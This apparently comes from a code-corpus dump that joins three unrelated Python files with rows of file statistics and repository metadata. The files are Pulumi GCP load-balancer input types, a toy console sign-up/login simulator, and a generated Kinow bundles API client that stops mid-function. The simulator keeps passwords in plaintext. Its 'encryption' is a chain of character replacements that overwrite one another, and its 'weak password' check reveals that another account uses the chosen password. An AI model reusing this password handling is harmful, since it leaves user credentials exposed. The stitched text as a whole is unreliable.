path: Optional[pulumi.Input[str]] = None,
service: Optional[pulumi.Input[str]] = None):
"""
Message for the expected URL mappings.
:param pulumi.Input[str] description: Description of this test case.
:param pulumi.Input[str] expected_output_url: The expected output URL evaluated by the load balancer containing the scheme, host, path and query parameters. For rules that forward requests to backends, the test passes only when expectedOutputUrl matches the request forwarded by the load balancer to backends. For rules with urlRewrite, the test verifies that the forwarded request matches hostRewrite and pathPrefixRewrite in the urlRewrite action. When service is specified, expectedOutputUrl`s scheme is ignored. For rules with urlRedirect, the test passes only if expectedOutputUrl matches the URL in the load balancer's redirect response. If urlRedirect specifies https_redirect, the test passes only if the scheme in expectedOutputUrl is also set to HTTPS. If urlRedirect specifies strip_query, the test passes only if expectedOutputUrl does not contain any query parameters. expectedOutputUrl is optional when service is specified.
:param pulumi.Input[int] expected_redirect_response_code: For rules with urlRedirect, the test passes only if expectedRedirectResponseCode matches the HTTP status code in load balancer's redirect response. expectedRedirectResponseCode cannot be set when service is set.
:param pulumi.Input[Sequence[pulumi.Input['UrlMapTestHeaderArgs']]] headers: HTTP headers for this request. If headers contains a host header, then host must also match the header value.
:param pulumi.Input[str] host: Host portion of the URL. If headers contains a host header, then host must also match the header value.
:param pulumi.Input[str] path: Path portion of the URL.
:param pulumi.Input[str] service: Expected BackendService or BackendBucket resource the given URL should be mapped to. The service field cannot be set if expectedRedirectResponseCode is set.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if expected_output_url is not None:
pulumi.set(__self__, "expected_output_url", expected_output_url)
if expected_redirect_response_code is not None:
pulumi.set(__self__, "expected_redirect_response_code", expected_redirect_response_code)
if headers is not None:
pulumi.set(__self__, "headers", headers)
if host is not None:
pulumi.set(__self__, "host", host)
if path is not None:
pulumi.set(__self__, "path", path)
if service is not None:
pulumi.set(__self__, "service", service)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of this test case.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="expectedOutputUrl")
def expected_output_url(self) -> Optional[pulumi.Input[str]]:
"""
The expected output URL evaluated by the load balancer containing the scheme, host, path and query parameters. For rules that forward requests to backends, the test passes only when expectedOutputUrl matches the request forwarded by the load balancer to backends. For rules with urlRewrite, the test verifies that the forwarded request matches hostRewrite and pathPrefixRewrite in the urlRewrite action. When service is specified, expectedOutputUrl`s scheme is ignored. For rules with urlRedirect, the test passes only if expectedOutputUrl matches the URL in the load balancer's redirect response. If urlRedirect specifies https_redirect, the test passes only if the scheme in expectedOutputUrl is also set to HTTPS. If urlRedirect specifies strip_query, the test passes only if expectedOutputUrl does not contain any query parameters. expectedOutputUrl is optional when service is specified.
"""
return pulumi.get(self, "expected_output_url")
@expected_output_url.setter
def expected_output_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expected_output_url", value)
@property
@pulumi.getter(name="expectedRedirectResponseCode")
def expected_redirect_response_code(self) -> Optional[pulumi.Input[int]]:
"""
For rules with urlRedirect, the test passes only if expectedRedirectResponseCode matches the HTTP status code in load balancer's redirect response. expectedRedirectResponseCode cannot be set when service is set.
"""
return pulumi.get(self, "expected_redirect_response_code")
@expected_redirect_response_code.setter
def expected_redirect_response_code(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "expected_redirect_response_code", value)
@property
@pulumi.getter
def headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['UrlMapTestHeaderArgs']]]]:
"""
HTTP headers for this request. If headers contains a host header, then host must also match the header value.
"""
return pulumi.get(self, "headers")
@headers.setter
def headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['UrlMapTestHeaderArgs']]]]):
pulumi.set(self, "headers", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
Host portion of the URL. If headers contains a host header, then host must also match the header value.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
"""
Path portion of the URL.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input[str]]:
"""
Expected BackendService or BackendBucket resource the given URL should be mapped to. The service field cannot be set if expectedRedirectResponseCode is set.
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service", value)
@pulumi.input_type
class UrlRewriteArgs:
def __init__(__self__, *,
host_rewrite: Optional[pulumi.Input[str]] = None,
path_prefix_rewrite: Optional[pulumi.Input[str]] = None):
"""
The spec for modifying the path before sending the request to the matched backend service.
:param pulumi.Input[str] host_rewrite: Before forwarding the request to the selected service, the request's host header is replaced with contents of hostRewrite. The value must be from 1 to 255 characters.
:param pulumi.Input[str] path_prefix_rewrite: Before forwarding the request to the selected backend service, the matching portion of the request's path is replaced by pathPrefixRewrite. The value must be from 1 to 1024 characters.
"""
if host_rewrite is not None:
pulumi.set(__self__, "host_rewrite", host_rewrite)
if path_prefix_rewrite is not None:
pulumi.set(__self__, "path_prefix_rewrite", path_prefix_rewrite)
@property
@pulumi.getter(name="hostRewrite")
def host_rewrite(self) -> Optional[pulumi.Input[str]]:
"""
Before forwarding the request to the selected service, the request's host header is replaced with contents of hostRewrite. The value must be from 1 to 255 characters.
"""
return pulumi.get(self, "host_rewrite")
@host_rewrite.setter
def host_rewrite(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host_rewrite", value)
@property
@pulumi.getter(name="pathPrefixRewrite")
def path_prefix_rewrite(self) -> Optional[pulumi.Input[str]]:
"""
Before forwarding the request to the selected backend service, the matching portion of the request's path is replaced by pathPrefixRewrite. The value must be from 1 to 1024 characters.
"""
return pulumi.get(self, "path_prefix_rewrite")
@path_prefix_rewrite.setter
def path_prefix_rewrite(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path_prefix_rewrite", value)
@pulumi.input_type
class VpnGatewayVpnGatewayInterfaceArgs:
def __init__(__self__, *,
interconnect_attachment: Optional[pulumi.Input[str]] = None):
"""
A VPN gateway interface.
:param pulumi.Input[str] interconnect_attachment: URL of the VLAN attachment (interconnectAttachment) resource for this VPN gateway interface. When the value of this field is present, the VPN gateway is used for IPsec-encrypted Cloud Interconnect; all egress or ingress traffic for this VPN gateway interface goes through the specified VLAN attachment resource. Not currently available publicly.
"""
if interconnect_attachment is not None:
pulumi.set(__self__, "interconnect_attachment", interconnect_attachment)
@property
@pulumi.getter(name="interconnectAttachment")
def interconnect_attachment(self) -> Optional[pulumi.Input[str]]:
"""
URL of the VLAN attachment (interconnectAttachment) resource for this VPN gateway interface. When the value of this field is present, the VPN gateway is used for IPsec-encrypted Cloud Interconnect; all egress or ingress traffic for this VPN gateway interface goes through the specified VLAN attachment resource. Not currently available publicly.
"""
return pulumi.get(self, "interconnect_attachment")
@interconnect_attachment.setter
def interconnect_attachment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "interconnect_attachment", value)
@pulumi.input_type
class WeightedBackendServiceArgs:
def __init__(__self__, *,
backend_service: Optional[pulumi.Input[str]] = None,
header_action: Optional[pulumi.Input['HttpHeaderActionArgs']] = None,
weight: Optional[pulumi.Input[int]] = None):
"""
In contrast to a single BackendService in HttpRouteAction to which all matching traffic is directed to, WeightedBackendService allows traffic to be split across multiple backend services. The volume of traffic for each backend service is proportional to the weight specified in each WeightedBackendService
:param pulumi.Input[str] backend_service: The full or partial URL to the default BackendService resource. Before forwarding the request to backendService, the load balancer applies any relevant headerActions specified as part of this backendServiceWeight.
:param pulumi.Input['HttpHeaderActionArgs'] header_action: Specifies changes to request and response headers that need to take effect for the selected backendService. headerAction specified here take effect before headerAction in the enclosing HttpRouteRule, PathMatcher and UrlMap. headerAction is not supported for load balancers that have their loadBalancingScheme set to EXTERNAL. Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
:param pulumi.Input[int] weight: Specifies the fraction of traffic sent to a backend service, computed as weight / (sum of all weightedBackendService weights in routeAction) . The selection of a backend service is determined only for new traffic. Once a user's request has been directed to a backend service, subsequent requests are sent to the same backend service as determined by the backend service's session affinity policy. The value must be from 0 to 1000.
"""
if backend_service is not None:
pulumi.set(__self__, "backend_service", backend_service)
if header_action is not None:
pulumi.set(__self__, "header_action", header_action)
if weight is not None:
pulumi.set(__self__, "weight", weight)
@property
@pulumi.getter(name="backendService")
def backend_service(self) -> Optional[pulumi.Input[str]]:
"""
The full or partial URL to the default BackendService resource. Before forwarding the request to backendService, the load balancer applies any relevant headerActions specified as part of this backendServiceWeight.
"""
return pulumi.get(self, "backend_service")
@backend_service.setter
def backend_service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backend_service", value)
@property
@pulumi.getter(name="headerAction")
def header_action(self) -> Optional[pulumi.Input['HttpHeaderActionArgs']]:
"""
Specifies changes to request and response headers that need to take effect for the selected backendService. headerAction specified here take effect before headerAction in the enclosing HttpRouteRule, PathMatcher and UrlMap. headerAction is not supported for load balancers that have their loadBalancingScheme set to EXTERNAL. Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
"""
return pulumi.get(self, "header_action")
@header_action.setter
def header_action(self, value: Optional[pulumi.Input['HttpHeaderActionArgs']]):
pulumi.set(self, "header_action", value)
@property
@pulumi.getter
def weight(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the fraction of traffic sent to a backend service, computed as weight / (sum of all weightedBackendService weights in routeAction) . The selection of a backend service is determined only for new traffic. Once a user's request has been directed to a backend service, subsequent requests are sent to the same backend service as determined by the backend service's session affinity policy. The value must be from 0 to 1000.
"""
return pulumi.get(self, "weight")
@weight.setter
def weight(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "weight", value)
| 59.953692
| 1,975
| 0.711688
| 99,828
| 772,923
| 5.381116
| 0.028529
| 0.071096
| 0.074806
| 0.029978
| 0.871123
| 0.815031
| 0.774564
| 0.720661
| 0.701409
| 0.669318
| 0
| 0.005208
| 0.202385
| 772,923
| 12,891
| 1,976
| 59.958343
| 0.866147
| 0.459308
| 0
| 0.478266
| 1
| 0
| 0.152987
| 0.077982
| 0
| 0
| 0
| 0
| 0
| 1
| 0.204679
| false
| 0.002813
| 0.000767
| 0.001918
| 0.319995
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
295f41247ff04098e944429ea02b5ed4f188112e
| 20,390
|
py
|
Python
|
Password_Username.py
|
shaunikm/SignUp-LogIn-Simulator
|
2aecc0921f7bc26cc1d68f317007bce8965e50b1
|
[
"MIT"
] | 1
|
2020-11-10T21:03:24.000Z
|
2020-11-10T21:03:24.000Z
|
Password_Username.py
|
shaunikm/SignUp-LogIn-Simulator
|
2aecc0921f7bc26cc1d68f317007bce8965e50b1
|
[
"MIT"
] | 2
|
2020-10-16T00:40:46.000Z
|
2020-10-18T00:18:39.000Z
|
Password_Username.py
|
shaunikm/SignUp-LogIn-Simulator
|
2aecc0921f7bc26cc1d68f317007bce8965e50b1
|
[
"MIT"
] | 3
|
2020-09-04T20:47:34.000Z
|
2020-10-18T00:12:40.000Z
|
import time
from getpass import getpass
from os import system
loopi = True
global k
k = 0
error_message = "\u001b[31mError: Invalid Response\u001b[0m"
loop_signup = False
loop_login = False
back_security = False
user_list = {
}
while loopi is True:
global username
global password
global password_new
global password_ask
global pass_check_change
loop_start = input("Hello! Do you want to sign up or log in? ")
starter = True
security_start = False
loop_signup = False
loop_login = False
back_security = False
loop_dec = False
repeat_acc = False
Task_settings = False
user_pass = False
weak = True
def change_password_l(juser):
global password
global password_new
juser.pop(user_check_change)
juser[user_check_change] = password_new
def change_password(juser):
global user_check_change
global password_new
juser.pop(user_check_change)
juser[user_check_change] = password_new
def user_create(juser):
juser[username] = password
return k
def pass_encryption(kgf):
re = str(kgf.replace("a", "!"))
re = str(re.replace("b", "@"))
re = str(re.replace("c", "#"))
re = str(re.replace("d", "$"))
re = str(re.replace("e", "("))
re = str(re.replace("f", "_"))
re = str(re.replace("g", "3"))
re = str(re.replace("h", "/"))
re = str(re.replace("i", "{"))
re = str(re.replace("j", "B"))
re = str(re.replace("k", "p"))
re = str(re.replace("l", "&"))
re = str(re.replace("m", "4"))
re = str(re.replace("n", "q"))
re = str(re.replace("o", "="))
re = str(re.replace("p", "Z"))
re = str(re.replace("q", "["))
re = str(re.replace("r", "J"))
re = str(re.replace("s", "2"))
re = str(re.replace("t", "w"))
re = str(re.replace("u", "v"))
re = str(re.replace("v", "M"))
re = str(re.replace("w", "L"))
re = str(re.replace("x", "+"))
re = str(re.replace("y", "\\"))
re = str(re.replace("z", "\""))
re = str(re.replace("1", "O"))
re = str(re.replace("2", "."))
re = str(re.replace("3", "j"))
re = str(re.replace("4", "?"))
re = str(re.replace("5", "S"))
re = str(re.replace("6", "}"))
re = str(re.replace("7", "Y"))
re = str(re.replace("8", "W"))
re = str(re.replace("9", "Q"))
re = str(re.replace("0", "%"))
re = str(re.replace("!", "1"))
re = str(re.replace("@", "T"))
re = str(re.replace("#", "U"))
re = str(re.replace("$", "9"))
re = str(re.replace("%", "G"))
re = str(re.replace("^", "P"))
re = str(re.replace("^", "N"))
re = str(re.replace("&", "*"))
re = str(re.replace("*", "&"))
re = str(re.replace("(", "-"))
re = str(re.replace(")", "H"))
re = str(re.replace("_", "="))
re = str(re.replace("-", "8"))
re = str(re.replace("+", "{"))
re = str(re.replace("=", "X"))
re = str(re.replace("|", "R"))
re = str(re.replace("\\", "H"))
re = str(re.replace("{", ";"))
re = str(re.replace("[", "]"))
re = str(re.replace("]", "["))
re = str(re.replace("}", "("))
return re
i = bool(loop_start)
lowerloop_start = str(loop_start.lower())
if starter is True and lowerloop_start == "sign up" or lowerloop_start == "signup":
starter = False
print("\n\u001b[37mDO NOT MAKE YOUR USERNAME AND PASSWORD THE SAME FOR SECURITY REASONS")
username = input("Username: ")
print("\n ")
print("(Your password will be encrypted after you make an account and until you want it to be decrypted)")
password = getpass("Password: \u001b[0m")
if username in user_list and bool(user_list) is True:
print("\u001b[31mUsername already taken\u001b[0m")
repeat_acc = True
time.sleep(2)
system('clear')
if username == password:
user_pass = True
print("\u001b[31mYour username and password cannot be the same\u001b[0m")
time.sleep(2)
system('clear')
elif username != password:
user_pass = False
if password in user_list.values():
print("\u001b[31mWeak password. Try a different one.\u001b[0m")
time.sleep(2)
system('clear')
weak = False
elif password not in user_list:
weak = True
encrypted_password = pass_encryption(password)
encrypted_username = pass_encryption(username)
if repeat_acc is False and user_pass is False and weak is True:
user_create(user_list)
loop_signup = True
elif repeat_acc is True:
loop_signup = False
if user_pass is True:
loop_signup = False
if weak is False:
loop_signup = False
while loop_signup is True:
encrypted_username = pass_encryption(username)
encrypted_password = pass_encryption(password)
back_security = True
system('clear')
print("Menu")
print("---------------------------------------------------------")
print("Settings\nSecurity\n\u001b[31mLOG OUT\u001b[0m")
Taskl = input("What do you want to select? ")
lowerTaskl = str(Taskl.lower())
if lowerTaskl == "log out" or lowerTaskl == "logout":
system('clear')
loop_signup = False
elif lowerTaskl == "security":
security_start = True
while security_start is True:
back_security = True
loop_dec = False
system('clear')
print("Security")
print("---------------------------------------------------------")
print("Encrypted Username: " + encrypted_username)
print("Encrypted Password: " + encrypted_password)
print("\u001b[37mDecrypt\u001b[0m")
print("\u001b[37mChange Password\u001b[0m")
print("\u001b[31mBACK\u001b[0m")
if back_security is True:
Task_security = input("What do you want to select? ")
Task_security_lower = Task_security.lower()
if Task_security_lower == "back" and back_security is True:
break
elif Task_security_lower == "change password" or Task_security_lower == "changepassword" and back_security is True:
print("To carry this function out, you will need to enter your account information")
user_check_change = input("\u001b[37mUsername: ")
pass_check_change = getpass("Password: \u001b[0m")
if user_check_change in user_list and user_list.get(user_check_change) == pass_check_change:
system('clear')
password_new = input("\u001b[37mWhat would you like to change your password to? \u001b[0m")
if password_new in user_list.values():
print("\u001b[31mWeak password. Try a different one.\u001b[0m")
time.sleep(2)
system('clear')
elif password_new not in user_list.values():
change_password(user_list)
encrypted_username = pass_encryption(username)
encrypted_password = pass_encryption(password_new)
password = password_new
else:
print("\u001b[31mWrong username or password\u001b[0m")
time.sleep(2)
elif Task_security_lower == "decrypt":
print("To carry this function out, you will need to enter your account information")
user_check = input("\u001b[37mUsername: ")
pass_check = getpass("Password: \u001b[0m")
if user_check in user_list and user_list.get(user_check) == pass_check:
loop_dec = True
break
else:
print("\u001b[31mWrong username or password\u001b[0m")
time.sleep(2)
else:
print(error_message)
time.sleep(2)
while loop_dec is True:
encrypted_username = pass_encryption(username)
encrypted_password = pass_encryption(password)
system('clear')
print("\u001b[0mSecurity")
print("---------------------------------------------------------")
print("Username: " + username)
print("Password: " + password)
print("\u001b[37mChange Password\u001b[0m")
print("\u001b[31mBACK\u001b[0m")
Task_security = input("What do you want to select? ")
Task_security_lower = Task_security.lower()
if Task_security_lower == "back" and back_security is True:
break
elif Task_security_lower == "change password" or Task_security_lower == "changepassword" and back_security is True:
print("To carry this function out, you will need to enter your account information")
user_check_change = input("\u001b[37mUsername: ")
pass_check_change = getpass("Password: \u001b[0m")
if user_check_change in user_list and user_list.get(user_check_change) == pass_check_change:
system('clear')
password_new = getpass("\u001b[37mWhat would you like to change your password to? \u001b[0m")
if password_new not in user_list.values():
change_password(user_list)
password = password_new
elif password_new in user_list.values():
print("\u001b[31mWeak password. Try a different one.\u001b[0m")
time.sleep(2)
system('clear')
else:
print("\u001b[31mWrong username or password\u001b[0m")
time.sleep(2)
else:
print(error_message)
time.sleep(2)
elif lowerTaskl == "settings":
Task_settings = True
while Task_settings is True:
system('clear')
print("\u001b[0mNothing here yet!\u001b[0m")
print("\u001b[31mBACK\u001b[0m")
Task_setting_task = input("\u001b[0mWhat do you want to select? \u001b[0m")
Task_setting_task_lower = Task_setting_task.lower()
if Task_setting_task_lower == "back":
break
else:
print(error_message)
time.sleep(2)
else:
print(error_message)
time.sleep(2)
elif starter is True and lowerloop_start == "login" or lowerloop_start == "log in" and bool(user_list) is False:
print("\u001b[31mError: No user accounts have been made yet\u001b[0m")
starter = False
time.sleep(2)
system('clear')
elif starter is True and lowerloop_start == "login" or lowerloop_start == "log in" and bool(user_list) is True:
starter = False
username_ask = input("\u001b[37mUsername: ")
print("\n ")
print("(Your password will be encrypted after you make an account and until you want it to be decrypted)")
password_ask = getpass("\u001b[0m")
encrypted_username = pass_encryption(username_ask)
encrypted_password = pass_encryption(password_ask)
if user_list.get(username_ask) == password_ask:
loop_login = True
else:
print("\u001b[31mWrong username or password\u001b[0m")
time.sleep(2)
system('clear')
while loop_login is True:
system('clear')
print("Menu")
print("---------------------------------------------------------")
print("Settings\nSecurity\n\u001b[31mLOG OUT\u001b[0m")
Task = input("What do you want to select? ")
lowerTask = str(Task.lower())
print(lowerTask)
if lowerTask == "log out" or lowerTask == "logout":
system('clear')
loop_login = False
elif lowerTask == "settings":
print("john likes pie:)))")
Task_settings = True
while Task_settings is True:
system('clear')
print("\u001b[0mNothing here yet!\u001b[0m")
print("\u001b[31mBACK\u001b[0m")
Task_setting_task = input("\u001b[0mWhat do you want to select? \u001b[0m")
Task_setting_task_lower = Task_setting_task.lower()
if Task_setting_task_lower == "back":
break
else:
print(error_message)
time.sleep(2)
elif lowerTask == "security":
security_start = True
while security_start is True:
back_security = True
loop_dec = False
system('clear')
print("Security")
print("---------------------------------------------------------")
print("Encrypted Username: " + encrypted_username)
print("Encrypted Password: " + encrypted_password)
print("\u001b[37mDecrypt\u001b[0m")
print("\u001b[37mChange Password\u001b[0m")
print("\u001b[31mBACK\u001b[0m")
if back_security is True:
Task_security = input("What do you want to select? ")
Task_security_lower = Task_security.lower()
if Task_security_lower == "back" and back_security is True:
break
elif Task_security_lower == "change password" or Task_security_lower == "changepassword" and back_security is True:
print("To carry this function out, you will need to enter your account information")
user_check_change = input("\u001b[37mUsername: ")
pass_check_change = getpass("Password: \u001b[0m")
if user_check_change in user_list and user_list.get(user_check_change) == pass_check_change:
system('clear')
password_new = getpass("\u001b[37mWhat would you like to change your password to? \u001b[0m")
if password_new not in user_list.values():
change_password_l(user_list)
password_ask = password_new
encrypted_username = pass_encryption(username_ask)
encrypted_password = pass_encryption(password_ask)
elif password in user_list.values():
print("\u001b[31mWeak password. Try a different one.\u001b[0m")
time.sleep(2)
system('clear')
else:
print("\u001b[31mWrong username or password\u001b[0m")
time.sleep(2)
elif Task_security_lower == "decrypt":
print("To carry this function out, you will need to enter your account information")
user_check = input("\u001b[37mUsername: ")
pass_check = getpass("Password: \u001b[0m")
if user_check in user_list and user_list.get(user_check) == pass_check:
loop_dec = True
break
else:
print("\u001b[31mWrong username or password\u001b[0m")
time.sleep(2)
else:
print(error_message)
time.sleep(2)
while loop_dec is True:
encrypted_username = pass_encryption(username_ask)
encrypted_password = pass_encryption(password_ask)
system('clear')
print("\u001b[0mSecurity")
print("---------------------------------------------------------")
print("Username: " + username)
print("Password: " + password_ask)
print("\u001b[37mChange Password\u001b[0m")
print("\u001b[31mBACK\u001b[0m")
Task_security = input("What do you want to select? ")
Task_security_lower = Task_security.lower()
if Task_security_lower == "back" and back_security is True:
break
elif Task_security_lower == "change password" or Task_security_lower == "changepassword" and back_security is True:
print("To carry this function out, you will need to enter your account information")
user_check_change = input("\u001b[37mUsername: ")
pass_check_change = getpass("Password: \u001b[0m")
if user_check_change in user_list and user_list.get(user_check_change) == pass_check_change:
system('clear')
password_new = getpass("\u001b[37mWhat would you like to change your password to? \u001b[0m")
if password_new in user_list.values():
print("\u001b[31mWeak password. Try a different one.\u001b[0m")
time.sleep(2)
system('clear')
elif password_new not in user_list.values():
change_password_l(user_list)
password_ask = password_new
else:
print("\u001b[31mWrong username or password\u001b[0m")
time.sleep(2)
else:
print(error_message)
time.sleep(2)
else:
print(error_message)
time.sleep(2)
elif starter is True or lowerloop_start != "sign up" or lowerloop_start != "signup" or lowerloop_start != "login" or lowerloop_start != "log in":
error_message.strip()
print(error_message)
time.sleep(2)
system('clear')
i = True
starter = False
| 48.089623
| 150
| 0.476606
| 2,025
| 20,390
| 4.641481
| 0.087901
| 0.030322
| 0.041707
| 0.083413
| 0.819023
| 0.752314
| 0.737951
| 0.731248
| 0.712735
| 0.693691
| 0
| 0.038094
| 0.409073
| 20,390
| 423
| 151
| 48.20331
| 0.74197
| 0
| 0
| 0.654731
| 0
| 0
| 0.196174
| 0.029949
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01023
| false
| 0.255754
| 0.007673
| 0
| 0.023018
| 0.186701
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
46321b145dae4c923ff9c7541d7c4a14d611aeea
| 15,533
|
py
|
Python
|
kinow_client/apis/bundles_api.py
|
kinow-io/kaemo-python-sdk
|
610fce09e3a9e631babf09195b0492959d9e4d56
|
[
"Apache-2.0"
] | 1
|
2017-05-03T12:48:22.000Z
|
2017-05-03T12:48:22.000Z
|
kinow_client/apis/bundles_api.py
|
kinow-io/kaemo-python-sdk
|
610fce09e3a9e631babf09195b0492959d9e4d56
|
[
"Apache-2.0"
] | null | null | null |
kinow_client/apis/bundles_api.py
|
kinow-io/kaemo-python-sdk
|
610fce09e3a9e631babf09195b0492959d9e4d56
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 2.0.9
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class BundlesApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_product_to_bundle(self, bundle_id, product_id, position, **kwargs):
"""
Add product to bundle
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_product_to_bundle(bundle_id, product_id, position, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int bundle_id: Bundle ID to fetch (required)
:param int product_id: Product ID to add (required)
:param int position: Product position (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_product_to_bundle_with_http_info(bundle_id, product_id, position, **kwargs)
else:
(data) = self.add_product_to_bundle_with_http_info(bundle_id, product_id, position, **kwargs)
return data
def add_product_to_bundle_with_http_info(self, bundle_id, product_id, position, **kwargs):
"""
Add product to bundle
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_product_to_bundle_with_http_info(bundle_id, product_id, position, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int bundle_id: Bundle ID to fetch (required)
:param int product_id: Product ID to add (required)
:param int position: Product position (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bundle_id', 'product_id', 'position']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_product_to_bundle" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bundle_id' is set
if ('bundle_id' not in params) or (params['bundle_id'] is None):
raise ValueError("Missing the required parameter `bundle_id` when calling `add_product_to_bundle`")
# verify the required parameter 'product_id' is set
if ('product_id' not in params) or (params['product_id'] is None):
raise ValueError("Missing the required parameter `product_id` when calling `add_product_to_bundle`")
# verify the required parameter 'position' is set
if ('position' not in params) or (params['position'] is None):
raise ValueError("Missing the required parameter `position` when calling `add_product_to_bundle`")
collection_formats = {}
resource_path = '/bundles/{bundle_id}'.replace('{format}', 'json')
path_params = {}
if 'bundle_id' in params:
path_params['bundle_id'] = params['bundle_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'product_id' in params:
form_params.append(('product_id', params['product_id']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'position' in params:
form_params.append(('position', params['position']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_bundle_products(self, bundle_id, **kwargs):
"""
Get products from bundle
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_bundle_products(bundle_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int bundle_id: Bundle ID to fetch (required)
:param int page:
:param int per_page:
:return: BlogPageProductsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_bundle_products_with_http_info(bundle_id, **kwargs)
else:
(data) = self.get_bundle_products_with_http_info(bundle_id, **kwargs)
return data
def get_bundle_products_with_http_info(self, bundle_id, **kwargs):
"""
Get products from bundle
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_bundle_products_with_http_info(bundle_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int bundle_id: Bundle ID to fetch (required)
:param int page:
:param int per_page:
:return: BlogPageProductsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bundle_id', 'page', 'per_page']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_bundle_products" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bundle_id' is set
if ('bundle_id' not in params) or (params['bundle_id'] is None):
raise ValueError("Missing the required parameter `bundle_id` when calling `get_bundle_products`")
collection_formats = {}
resource_path = '/bundles/{bundle_id}/products'.replace('{format}', 'json')
path_params = {}
if 'bundle_id' in params:
path_params['bundle_id'] = params['bundle_id']
query_params = {}
if 'page' in params:
query_params['page'] = params['page']
if 'per_page' in params:
query_params['per_page'] = params['per_page']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BlogPageProductsResponse',
